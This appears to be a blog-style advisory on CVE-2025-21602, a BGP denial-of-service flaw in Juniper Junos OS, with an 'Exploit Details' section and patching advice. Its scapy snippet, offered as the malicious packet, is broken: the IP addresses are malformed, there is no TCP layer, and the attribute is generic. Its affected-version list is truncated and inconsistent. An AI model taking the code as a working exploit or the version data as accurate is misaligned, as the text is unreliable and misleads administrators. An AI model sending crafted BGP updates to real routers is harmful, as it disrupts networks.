CVE-2025-21602: Juniper Networks Junos OS and Junos OS Evolved Denial of Service (DoS) Vulnerability Due to Improper Handling of Exceptional Conditions

A newly discovered vulnerability, dubbed CVE-2025-21602, has been found in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved. This Improper Handling of Exceptional Conditions vulnerability allows an unauthenticated adjacent attacker to cause a Denial of Service (DoS) attack by sending a specifically crafted BGP update packet that causes the rpd to crash and restart. If the attacker continuously sends this malicious packet, a sustained DoS is achieved, severely disrupting the affected network.

The vulnerability affects both internal (iBGP) and external (eBGP) routing protocols and impacts both IPv4 and IPv6. It is essential for network administrators to apply patches and secure their Juniper Networks devices in order to prevent potential attacks.

* 24.2 before 24.2R1-S2, 24.2R2;

Versions prior to 21.1R1 are not affected by this vulnerability.

* 24.2 before 24.2R1-S2-EVO, 24.2R2-EVO.

Versions prior to 21.1R1-EVO are not affected by this vulnerability.

Exploit Details

The vulnerability is triggered when an attacker sends a malformed BGP update packet to a target device running a vulnerable version of Junos OS or Junos OS Evolved. The malicious BGP update packet can be constructed as follows:

from scapy.all import *
from scapy.contrib import bgp

def create_malicious_bgp_packet():
    source_ip = "192..2.1"
    target_ip = "192..2.2"

    malicious_bgp_packet = Ether() / IP(src=source_ip, dst=target_ip) / bgp.BGPHeader() / bgp.BGPUpdate()
    malicious_bgp_packet[bgp.BGPUpdate].path_attr = [bgp.BGPPathAttribute() / bgp.BGPAttribUnknown()]

    return malicious_bgp_packet

When the target device processes the malicious BGP update packet, the rpd crashes and restarts, resulting in a DoS condition. Continuous receipt and processing of this packet can create a sustained DoS attack, severely impacting the affected network.

Mitigation and Prevention

To protect against this vulnerability, network administrators should immediately apply the appropriate patches provided by Juniper Networks for the affected versions of Junos OS and Junos OS Evolved.

Additionally, it is recommended to

* Implement strict BGP peering authentication and filtering policies to prevent unauthorized BGP updates.

* Regularly update and maintain all network devices to prevent future vulnerabilities.

For more information on CVE-2025-21602, please refer to the original advisory and Juniper Networks’ security bulletin.

Timeline

Published on: 01/09/2025 17:15:19 UTC